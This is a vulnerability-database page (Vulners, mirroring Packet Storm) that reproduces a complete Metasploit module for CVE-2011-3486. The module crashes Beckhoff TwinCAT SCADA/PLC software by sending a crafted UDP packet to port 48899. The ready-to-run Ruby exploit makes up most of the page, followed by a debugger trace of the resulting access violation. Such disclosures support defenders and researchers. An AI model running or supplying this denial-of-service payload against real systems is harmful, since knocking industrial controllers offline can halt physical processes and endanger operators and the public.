Vulners
Lucene search
Beckhoff TwinCAT SCADA PLC 2.11.0.2004 Denial Of Service
🗓️ 31 Aug 2024 00:00:00Reported by Luigi Auriemma, jfa, metasploit.comType 
packetstorm🔗 packetstormsecurity.com👁 259 Views
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | CVE-2011-3486 | 14 Sep 201100:00 | – | circl |
 | Beckhoff TwinCAT Out-Of-Bounds Read Denial of Service (CVE-2011-3486) | 3 Dec 201200:00 | – | checkpoint_advisories |
 | CVE-2011-3486 | 16 Sep 201114:00 | – | cve |
 | CVE-2011-3486 | 16 Sep 201114:00 | – | cvelist |
 | Beckhoff TwinCAT Read Access Violation | 9 Jul 201106:00 | – | ics |
 | Beckhoff TwinCAT SCADA PLC 2.11.0.2004 DoS | 10 Oct 201123:41 | – | metasploit |
 | CVE-2011-3486 | 16 Sep 201114:28 | – | nvd |
 | Beckhoff Twincat Improper Restriction of Operations within the Bounds of a Memory Buffer | 27 May 202000:00 | – | nessus |
| Beckhoff TwinCAT Read Access Violation (CVE-2011-3486) | 7 Feb 202200:00 | – | nessus |
 | Out-of-bounds | 16 Sep 201114:28 | – | prion |
10
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Udp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'Beckhoff TwinCAT SCADA PLC 2.11.0.2004 DoS',
'Description' => %q{
The Beckhoff TwinCAT version <= 2.11.0.2004 can be brought down by sending
a crafted UDP packet to port 48899 (TCATSysSrv.exe).
},
'Author' =>
[
'Luigi Auriemma', # Public exploit
'jfa', # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2011-3486' ],
[ 'OSVDB', '75495' ],
[ 'URL', 'http://aluigi.altervista.org/adv/twincat_1-adv.txt' ]
],
'DisclosureDate' => '2011-09-13'
))
register_options([Opt::RPORT(48899)])
end
def run
dos = "\x03\x66\x14\x71" + "\x00"*16 + "\xff"*1514
connect_udp
print_status("Sending DoS packet ...")
udp_sock.put(dos)
disconnect_udp
end
end
=begin
0:017> g
(4d4.850): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=02a1f9cf ebx=0037c0a8 ecx=02a0f9cc edx=ffffffff esi=02a0f9b4 edi=00000001
eip=00414f6a esp=02a0f7bc ebp=0000ffff iopl=0 nv up ei pl nz ac po cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010213
*** ERROR: Module load completed but symbols could not be loaded for C:\TwinCAT\TCATSysSrv.exe
TCATSysSrv+0x14f6a:
00414f6a 66833802 cmp word ptr [eax],2 ds:0023:02a1f9cf=????
0:016> k
ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be wrong.
02a0f7f8 71ab265b TCATSysSrv+0x14f6a
02a0f80c 71ab4a9e WS2_32!Prolog_v1+0x21
02a0f834 7c90df3c WS2_32!WPUQueryBlockingCallback+0x1b
02a0f880 71a5332f ntdll!NtWaitForSingleObject+0xc
02a0f8f4 71abf6e7 mswsock!WSPRecvFrom+0x35c
02a0f938 71ad303a WS2_32!WSARecvFrom+0x7d
02a0f96c 00414b92 WSOCK32!recvfrom+0x39
02a0f988 00000000 TCATSysSrv+0x14b92
=end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
31 Aug 2024 00:00Current
7High risk
Vulners AI Score7
CVSS 25
EPSS0.58413